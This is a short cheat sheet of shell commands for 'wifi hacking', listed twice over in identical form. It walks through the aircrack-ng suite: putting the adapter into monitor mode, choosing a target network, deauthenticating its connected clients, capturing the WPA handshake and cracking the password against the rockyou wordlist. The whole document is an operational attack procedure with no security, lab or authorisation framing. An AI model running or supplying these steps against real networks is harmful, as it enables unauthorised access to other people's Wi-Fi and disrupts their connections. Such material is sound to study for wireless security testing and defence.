# COMMANDS FOR WIFI HACKING
$ iwconfig --> to check the wifi is on monitor mode or not
$ airmon-ng check kill --> to check and stop any ongoing wifi processes
$ airmon-ng start wlan0 --> to start wlan0 in monitor mode
$ iwconfig --> check wlan0 is in monitor mode or not
$ airodump-ng wlan0 --> to see all the available networks and copy the bssid u want to attack CTRL C after finding the bssid and channel
$ airodump-ng wlan0 -d 00:00:00:00:00:00 --> to display only the network u want to attack and its connrect devices CTRL C
$ airodump-ng -w filename -c 11 --bssid 00:00:00:00:00:00 wlan0 --> after -w write the filename for store the handshake capture file -c for channel keep this window running and open another tab
$ sudo aireplay --deauth 0 -a 00:00:00:00:00:00 wlan0 --> to deauthentic the network
now go to the pevious windows and see wpa handshake is showing or not if showing u have sucessfully capture the handshake file now CTRL c to stop
$ ls --> to find the cap file something like this hackwifi.01.cap
$ wireshark hackwifi.01.cap --> to see the capture file and search for eapol
$ airmon-ng stop wlan0 --> to stop the monitor mode u can't use wifi when u are in monitor mode
$ aircrack-ng hackwifi.01.cap -w /usr/share/wordlists/rockyou.txt --> to decrypt the handshake file using wordlist
$ iwconfig --> to check the wifi is on monitor mode or not
$ airmon-ng check kill --> to check and stop any ongoing wifi processes
$ airmon-ng start wlan0 --> to start wlan0 in monitor mode
$ iwconfig --> check wlan0 is in monitor mode or not
$ airodump-ng wlan0 --> to see all the available networks and copy the bssid u want to attack CTRL C after finding the bssid and channel
$ airodump-ng wlan0 -d 00:00:00:00:00:00 --> to display only the network u want to attack and its connrect devices CTRL C
$ airodump-ng -w filename -c 11 --bssid 00:00:00:00:00:00 wlan0 --> after -w write the filename for store the handshake capture file -c for channel keep this window running and open another tab
$ sudo aireplay --deauth 0 -a 00:00:00:00:00:00 wlan0 --> to deauthentic the network
now go to the pevious windows and see wpa handshake is showing or not if showing u have sucessfully capture the handshake file now CTRL c to stop
$ ls --> to find the cap file something like this hackwifi.01.cap
$ wireshark hackwifi.01.cap --> to see the capture file and search for eapol
$ airmon-ng stop wlan0 --> to stop the monitor mode u can't use wifi when u are in monitor mode
$ aircrack-ng hackwifi.01.cap -w /usr/share/wordlists/rockyou.txt --> to decrypt the handshake file using wordlist